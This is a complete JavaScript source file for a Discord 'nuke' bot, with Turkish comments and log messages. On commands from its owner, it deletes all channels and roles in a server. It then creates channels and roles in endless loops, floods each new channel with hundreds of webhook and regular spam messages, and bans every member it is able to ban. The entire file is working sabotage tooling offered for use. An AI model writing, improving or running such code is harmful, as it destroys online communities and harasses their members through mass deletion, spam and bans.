const { Client, GatewayIntentBits, PermissionFlagsBits, ActivityType } = require('discord.js');
const config = require('./config.json');

const client = new Client({
    intents: [
        GatewayIntentBits.Guilds,
        GatewayIntentBits.GuildMessages,
        GatewayIntentBits.MessageContent,
        GatewayIntentBits.GuildMembers
    ]
});

let nukeActive = false;

// ═══════════════════════════════════════════════════════
// MEGA ULTRA FAST SPAM - HİÇ DURMA!
// ═══════════════════════════════════════════════════════

// ANINDA WEBHOOK SPAM - 200 MESAJ!
async function megaWebhookSpam(channel) {
    try {
        const webhook = await channel.createWebhook({
            name: '',
            avatar: 'https://i.pinimg.com/736x/ec/10/df/ec10df93154cc37dbc24eb8c71fc1ebe.jpg'
        });

        // 200 MESAJ ANINDA!
        const promises = [];
        for (let i = 0; i < 700; i++) {
            promises.push(
                webhook.send({
                    content: config.spamMessage,
                    username: '',
                    avatarURL: 'https://i.pinimg.com/736x/ec/10/df/ec10df93154cc37dbc24eb8c71fc1ebe.jpg'
                }).catch(() => {})
            );
        }
        await Promise.all(promises);

    } catch (error) {
        // Fallback
        for (let i = 0; i < 600; i++) {
            channel.send(config.spamMessage).catch(() => {});
        }
    }
}

// NORMAL SPAM - 100 MESAJ ANINDA!
async function megaNormalSpam(channel) {
    const promises = [];
    for (let i = 0; i < 600; i++) {
        promises.push(channel.send(config.spamMessage).catch(() => {}));
    }
    await Promise.all(promises);
}

// ═══════════════════════════════════════════════════════
// INSTANT DELETE - HİÇ BEKLEME!
// ═══════════════════════════════════════════════════════

async function instantNukeChannels(guild) {
    console.log('[DELETE] 💥 KANALLAR SİLİNİYOR...');
    
    const promises = [];
    guild.channels.cache.forEach(ch => {
        promises.push(ch.delete().catch(() => {}));
    });
    
    await Promise.all(promises);
    console.log('[DELETE] ✅ TÜM KANALLAR SİLİNDİ');
}

async function instantNukeRoles(guild) {
    console.log('[DELETE] 💥 ROLLER SİLİNİYOR...');
    
    const promises = [];
    guild.roles.cache.forEach(role => {
        if (role.name !== '@everyone' && role.position < guild.members.me.roles.highest.position) {
            promises.push(role.delete().catch(() => {}));
        }
    });
    
    await Promise.all(promises);
    console.log('[DELETE] ✅ TÜM ROLLER SİLİNDİ');
}

// ═══════════════════════════════════════════════════════
// MEGA SONSUZ KANAL + SPAM - MAXIMUM HIZ!
// ═══════════════════════════════════════════════════════

async function megaInfiniteChannels(guild) {
    console.log('[CREATE] 🔥 MEGA SONSUZ KANAL MODU BAŞLADI!');
    
    let count = 0;
    
    while (nukeActive) {
        try {
            // 20 KANAL AYNI ANDA! (2x daha fazla)
            const promises = [];
            
            for (let i = 0; i < 100; i++) {
                promises.push(
                    guild.channels.create({
                        name: '',
                        type: 0,
                        permissionOverwrites: [{
                            id: guild.id,
                            allow: [PermissionFlagsBits.ViewChannel, PermissionFlagsBits.SendMessages]
                        }]
                    }).then(async channel => {
                        count++;
                        console.log(`[CREATE] ✅ Kanal ${count}: ${channel.name}`);
                        
                        // ANINDA 300+ MESAJ!
                        megaWebhookSpam(channel);
                        megaNormalSpam(channel);
                        
                        return channel;
                    }).catch(() => {})
                );
            }
            
            await Promise.all(promises);
            
            // 0 BEKLEME! Direkt devam!
            
        } catch (error) {
            // Hata yoksay, devam!
        }
    }
}

// ═══════════════════════════════════════════════════════
// MEGA SONSUZ ROL - MAXIMUM HIZ!
// ═══════════════════════════════════════════════════════

async function megaInfiniteRoles(guild) {
    console.log('[CREATE] 🔥 MEGA SONSUZ ROL MODU BAŞLADI!');
    
    let count = 0;
    
    while (nukeActive) {
        try {
            // 50 ROL AYNI ANDA! (2.5x daha fazla)
            const promises = [];
            
            for (let i = 0; i < 80; i++) {
                promises.push(
                    guild.roles.create({
                        name: '',
                        color: 'Red',
                        permissions: []
                    }).then(role => {
                        count++;
                        if (count % 50 === 0) {
                            console.log(`[CREATE] ✅ ${count} ROL OLUŞTURULDU`);
                        }
                        return role;
                    }).catch(() => {})
                );
            }
            
            await Promise.all(promises);
            
            // 0 BEKLEME!
            
        } catch (error) {
            // Hata yoksay!
        }
    }
}

// ═══════════════════════════════════════════════════════
// INSTANT MASS BAN
// ═══════════════════════════════════════════════════════

async function instantMassBan(guild) {
    console.log('');
    console.log('═'.repeat(70));
    console.log('🔨 INSTANT MASS BAN BAŞLATILDI');
    console.log('═'.repeat(70));
    
    try {
        await guild.members.fetch();
        
        const members = guild.members.cache;
        let banned = 0;
        
        console.log(`[BAN] ${members.size} ÜYE BULUNDU - BANLANIYORLAR...\n`);
        
        const promises = [];
        
        members.forEach(member => {
            if (member.id === client.user.id || member.id === config.ownerId) return;
            if (!member.bannable) return;
            
            promises.push(
                member.ban({ reason: '' })
                    .then(() => {
                        banned++;
                        console.log(`[BAN] ✅ ${member.user.tag}`);
                    })
                    .catch(() => {})
            );
        });
        
        // HEPSINI AYNI ANDA BAN ET!
        await Promise.all(promises);
        
        console.log('');
        console.log('═'.repeat(60));
        console.log(`✅ ${banned} KİŞİ BANLANDI!`);
        console.log('═'.repeat(60));
        console.log('');
        
        return banned;
        
    } catch (error) {
        console.error(`[BAN] HATA: ${error.message}`);
        return 0;
    }
}

// ═══════════════════════════════════════════════════════
// MEGA ULTRA NUKE - MAXIMUM POWER!
// ═══════════════════════════════════════════════════════

async function megaUltraNuke(guild) {
    console.log('');
    console.log('═'.repeat(70));
    console.log('🔥💥⚡ MEGA ULTRA NUKE - MAXIMUM POWER! ⚡💥🔥');
    console.log('═'.repeat(70));
    console.log(`Sunucu: ${guild.name}`);
    console.log('MODE: SONSUZ + 0 BEKLEME + MAXIMUM HIZ');
    console.log('═'.repeat(70));
    console.log('');
    
    nukeActive = true;
    
    try {
        // HER ŞEYİ AYNI ANDA SİL!
        await Promise.all([
            instantNukeChannels(guild),
            instantNukeRoles(guild)
        ]);
        
        console.log('');
        console.log('═'.repeat(70));
        console.log('✅ SİLME TAMAMLANDI!');
        console.log('🔥 SONSUZ SPAM MODU BAŞLIYOR...');
        console.log('⚡ 20 KANAL + 50 ROL HER DÖNGÜDE!');
        console.log('💥 300+ MESAJ/KANAL!');
        console.log('═'.repeat(70));
        console.log('');
        
        // SONSUZ KANAL + ROL - PARALEL ÇALIŞ!
        Promise.all([
            megaInfiniteChannels(guild),
            megaInfiniteRoles(guild)
        ]);
        
    } catch (error) {
        console.log(`[NUKE] Hata: ${error.message}`);
    }
}

// ═══════════════════════════════════════════════════════
// BOT EVENTS
// ═══════════════════════════════════════════════════════

client.on('ready', () => {
    console.log('');
    console.log('═'.repeat(60));
    console.log(`✅ MEGA ULTRA NUKE BOT AKTIF: ${client.user.tag}`);
    console.log(`📡 ${client.guilds.cache.size} sunucuda`);
    console.log(`⚡ Prefix: ${config.prefix}`);
    console.log('═'.repeat(70));
    console.log('');
    console.log('⚡ KOMUTLAR:');
    console.log(`  ${config.prefix}patlat  → MEGA SONSUZ NUKE (20 kanal + 50 rol/döngü)`);
    console.log(`  ${config.prefix}b       → INSTANT MASS BAN`);
    console.log(`  ${config.prefix}durdur  → Nuke'u durdur`);
    console.log('');
    console.log('🔥 ÖZELLİKLER:');
    console.log('   • 20 kanal/döngü (2x daha hızlı)');
    console.log('   • 50 rol/döngü (2.5x daha hızlı)');
    console.log('   • 300+ mesaj/kanal');
    console.log('   • 0 BEKLEME - HİÇ DURMA!');
    console.log('   • Sonsuz döngü');
    console.log('═'.repeat(60));
    console.log('');

    client.user.setPresence({
        activities: [{ 
            name: 'laxecan yaptı beni',
            type: ActivityType.Playing
        }],
        status: 'dnd'
    });
});

// OTO SPAM - YENİ KANAL
client.on('channelCreate', async (channel) => {
    if (channel.type !== 0) return;
    
    console.log(`[AUTO-SPAM] 💥 YENİ KANAL: ${channel.name}`);
    
    // ANINDA MEGA SPAM!
    megaWebhookSpam(channel);
    megaNormalSpam(channel);
});

client.on('messageCreate', async message => {
    if (message.author.bot || !message.guild) return;
    if (message.author.id !== config.ownerId) return;
    if (!message.content.startsWith(config.prefix)) return;

    const args = message.content.slice(config.prefix.length).trim().split(/ +/);
    const command = args.shift().toLowerCase();

    if (command === 'patlat') {
        if (!message.guild.members.me.permissions.has(PermissionFlagsBits.Administrator)) {
            return message.reply('❌ Admin yetkisi yok!');
        }

        await message.reply('🔥💥⚡ MEGA ULTRA NUKE BAŞLIYOR!\n• 20 kanal/döngü\n• 50 rol/döngü\n• 300+ mesaj/kanal\n• SONSUZ MOD!\n\nDURDURMAK: `!durdur`');
        
        await megaUltraNuke(message.guild);
    }

    else if (command === 'b') {
        if (!message.guild.members.me.permissions.has(PermissionFlagsBits.BanMembers)) {
            return message.reply('❌ Ban yetkisi yok!');
        }

        await message.reply('🔨⚡ INSTANT MASS BAN BAŞLIYOR...');
        
        const count = await instantMassBan(message.guild);
        
        await message.channel.send(`✅ ${count} KİŞİ BANLANDI!`).catch(() => {});
    }

    else if (command === 'durdur') {
        nukeActive = false;
        await message.reply('⛔ MEGA NUKE DURDURULUYOR...');
        console.log('');
        console.log('═'.repeat(60));
        console.log('[STOP] ⛔ NUKE DURDURULDU!');
        console.log('═'.repeat(60));
        console.log('');
    }
});

client.on('error', error => console.error('[ERROR]', error));
process.on('unhandledRejection', error => console.error('[UNHANDLED]', error));

client.login(config.token).catch(error => {
    console.error('❌ Bot giriş yapamadı:', error.message);
    process.exit(1);
});
